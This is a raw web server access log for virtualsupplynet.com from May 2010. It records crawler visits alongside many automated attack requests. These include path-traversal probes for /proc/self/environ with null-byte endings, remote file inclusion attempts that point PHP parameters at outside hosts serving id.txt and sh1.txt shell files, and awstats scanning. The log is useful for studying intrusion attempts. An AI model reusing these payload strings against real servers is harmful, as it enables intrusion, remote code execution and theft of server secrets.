207.210.85.138 - - [17/May/2010:00:04:45 -0700] "GET /logs/index.php?base_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.virtualsupplynet.com"
207.210.85.138 - - [17/May/2010:00:04:45 -0700] "GET /index.php?base_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.virtualsupplynet.com"
69.94.137.93 - - [17/May/2010:00:06:23 -0700] "GET /logs/index.php?base_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
69.94.137.93 - - [17/May/2010:00:06:23 -0700] "GET /logs/index.php?base_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
69.94.137.93 - - [17/May/2010:00:06:23 -0700] "GET /index.php?base_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
69.94.137.93 - - [17/May/2010:00:06:23 -0700] "GET /index.php?base_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
67.195.110.174 - - [17/May/2010:04:03:53 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [17/May/2010:04:03:53 -0700] "GET /logs/?S=A HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [17/May/2010:05:02:21 -0700] "GET /logs/?N=A HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [17/May/2010:07:20:46 -0700] "GET /?M=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
208.80.193.41 - - [17/May/2010:07:55:19 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MSDigitalLocker; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )" "virtualsupplynet.com"
72.55.146.200 - - [17/May/2010:08:01:56 -0700] "GET /cache/errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
72.55.146.200 - - [17/May/2010:08:01:56 -0700] "GET /logs//cache/errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
67.195.115.87 - - [17/May/2010:08:26:03 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.87 - - [17/May/2010:08:26:04 -0700] "GET /logs/?N=D HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
74.55.2.66 - - [17/May/2010:08:49:52 -0700] "GET /logs/postscript.php?p_mode=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.virtualsupplynet.com"
74.55.2.66 - - [17/May/2010:08:49:52 -0700] "GET /postscript.php?p_mode=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.virtualsupplynet.com"
216.120.232.2 - - [17/May/2010:08:51:13 -0700] "GET /logs/postscript.php?p_mode=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
216.120.232.2 - - [17/May/2010:08:51:13 -0700] "GET /postscript.php?p_mode=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
207.46.204.236 - - [17/May/2010:10:11:35 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
207.46.204.236 - - [17/May/2010:10:19:51 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:43 -0700] "GET /awstats/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:43 -0700] "GET /awstats6/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:43 -0700] "GET /awstats6/cgi-bin/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:43 -0700] "GET /cgi-bin/awstats6/6awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:43 -0700] "GET /awstat/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:44 -0700] "GET /system-cgi/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:44 -0700] "GET /cgi/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:44 -0700] "GET /cp/awstats/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:44 -0700] "GET /stats/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:45 -0700] "GET /stats/cgi-bin/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:45 -0700] "GET /stat/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:45 -0700] "GET /awstats-cgi/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:45 -0700] "GET /awstats/cgi-bin/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:45 -0700] "GET /cgi-bin/awstat/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:46 -0700] "GET /cgi-bin/awstats/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:46 -0700] "GET /statistics/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:46 -0700] "GET /statistic/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:46 -0700] "GET /cgi-bin/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:47 -0700] "GET /logs/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:47 -0700] "GET /webstats/awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
89.185.228.11 - - [17/May/2010:10:34:47 -0700] "GET /awstats.pl HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
95.108.142.138 - - [17/May/2010:12:07:58 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [17/May/2010:12:07:59 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.142.138 - - [17/May/2010:12:08:00 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [17/May/2010:12:08:01 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.142.138 - - [17/May/2010:12:08:02 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [17/May/2010:12:08:03 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
67.195.115.87 - - [17/May/2010:12:52:46 -0700] "GET /logs/access_090926.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
81.80.122.44 - - [17/May/2010:13:49:05 -0700] "GET /logs/?sourcedir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 200 3798 "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
81.80.122.44 - - [17/May/2010:13:49:05 -0700] "GET /?sourcedir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
88.250.57.232 - - [17/May/2010:15:16:02 -0700] "GET /logs/access_100516.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [17/May/2010:15:16:03 -0700] "GET /logs/access_100517.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
67.195.115.87 - - [17/May/2010:17:08:01 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.87 - - [17/May/2010:17:08:01 -0700] "GET /logs/access_100130.log HTTP/1.0" 200 99929 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
74.124.219.45 - - [17/May/2010:20:45:32 -0700] "GET /logs/access_091205.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
74.124.219.45 - - [17/May/2010:20:45:32 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
74.124.219.45 - - [17/May/2010:20:45:33 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
91.121.20.59 - - [17/May/2010:23:42:20 -0700] "GET /logs/index.php?option=com_hashcash&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
91.121.20.59 - - [17/May/2010:23:42:20 -0700] "GET /index.php?option=com_hashcash&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
91.121.78.216 - - [18/May/2010:00:31:39 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
91.121.78.216 - - [18/May/2010:00:31:39 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
91.121.78.216 - - [18/May/2010:00:31:39 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
91.121.78.216 - - [18/May/2010:00:31:39 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
94.23.60.216 - - [18/May/2010:00:31:50 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
94.23.60.216 - - [18/May/2010:00:31:51 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
94.23.60.216 - - [18/May/2010:00:31:55 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
94.23.60.216 - - [18/May/2010:00:31:55 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
217.73.227.210 - - [18/May/2010:00:36:46 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.virtualsupplynet.com"
217.73.227.210 - - [18/May/2010:00:36:47 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.virtualsupplynet.com"
66.197.217.181 - - [18/May/2010:00:36:51 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
66.197.217.181 - - [18/May/2010:00:36:51 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
174.120.217.47 - - [18/May/2010:00:36:58 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
174.120.217.47 - - [18/May/2010:00:36:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
124.217.229.185 - - [18/May/2010:00:38:08 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
124.217.229.185 - - [18/May/2010:00:38:09 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
121.88.4.141 - - [18/May/2010:01:33:34 -0700] "GET /logs/?GALLERY_BASEDIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3798 "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
121.88.4.141 - - [18/May/2010:01:33:35 -0700] "GET /?GALLERY_BASEDIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
75.125.250.26 - - [18/May/2010:01:35:00 -0700] "GET /logs/index2.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
75.125.250.26 - - [18/May/2010:01:35:00 -0700] "GET /index2.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
124.217.229.185 - - [18/May/2010:01:47:26 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
124.217.229.185 - - [18/May/2010:01:47:27 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
66.235.124.132 - - [18/May/2010:02:34:51 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.virtualsupplynet.com"
66.235.124.132 - - [18/May/2010:02:34:51 -0700] "GET /logs/access.log HTTP/1.1" 200 42495 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11" "www.virtualsupplynet.com"
85.17.137.64 - - [18/May/2010:02:55:53 -0700] "GET /logs/access_100515.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
85.17.137.64 - - [18/May/2010:02:55:53 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
85.17.137.64 - - [18/May/2010:02:55:53 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
208.80.193.28 - - [18/May/2010:03:56:50 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)" "www.virtualsupplynet.com"
67.195.110.174 - - [18/May/2010:04:12:17 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [18/May/2010:04:12:17 -0700] "GET /logs/access_100130.log HTTP/1.0" 200 99929 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
208.115.208.200 - - [18/May/2010:05:35:08 -0700] "GET /logs/index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
208.115.208.200 - - [18/May/2010:05:35:08 -0700] "GET /index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
193.47.80.41 - - [18/May/2010:07:41:15 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
193.47.80.41 - - [18/May/2010:07:41:16 -0700] "GET /?M=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
77.221.137.18 - - [18/May/2010:07:43:28 -0700] "GET /logs/access_100515.logjamroom[jm_dir]=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.virtualsupplynet.com"
77.221.137.18 - - [18/May/2010:07:43:29 -0700] "GET /jamroom[jm_dir]=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.virtualsupplynet.com"
77.221.137.18 - - [18/May/2010:07:43:29 -0700] "GET /logs/jamroom[jm_dir]=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.virtualsupplynet.com"
94.125.182.40 - - [18/May/2010:07:51:48 -0700] "GET /logs/access_100515.log/errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
94.125.182.40 - - [18/May/2010:07:51:49 -0700] "GET /errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
94.125.182.40 - - [18/May/2010:07:51:52 -0700] "GET /logs//errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
125.162.206.179 - - [18/May/2010:08:21:24 -0700] "GET /logs/access_100515.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://kikuk.webng.com/.dev13/sh1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
125.162.206.179 - - [18/May/2010:08:21:24 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://kikuk.webng.com/.dev13/sh1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
125.162.206.179 - - [18/May/2010:08:21:28 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://kikuk.webng.com/.dev13/sh1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
66.249.68.59 - - [18/May/2010:08:43:54 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
217.14.6.210 - - [18/May/2010:08:50:18 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "www.virtualsupplynet.com"
217.14.6.210 - - [18/May/2010:08:50:20 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" "www.virtualsupplynet.com"
95.108.142.138 - - [18/May/2010:09:21:18 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [18/May/2010:09:21:19 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.142.138 - - [18/May/2010:09:21:20 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [18/May/2010:09:21:21 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.142.138 - - [18/May/2010:09:21:22 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [18/May/2010:09:21:23 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
87.252.3.230 - - [18/May/2010:12:03:24 -0700] "GET /logs/access_100515.log/errors.php?error=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
87.252.3.230 - - [18/May/2010:12:03:24 -0700] "GET /errors.php?error=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
87.252.3.230 - - [18/May/2010:12:03:24 -0700] "GET /logs//errors.php?error=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
89.163.148.130 - - [18/May/2010:12:22:11 -0700] "GET /logs//index.php?option=com_hashcash=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
89.163.148.130 - - [18/May/2010:12:22:11 -0700] "GET /index.php?option=com_hashcash=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
89.163.148.130 - - [18/May/2010:13:00:13 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
89.163.148.130 - - [18/May/2010:13:00:14 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
67.195.115.87 - - [18/May/2010:13:18:41 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
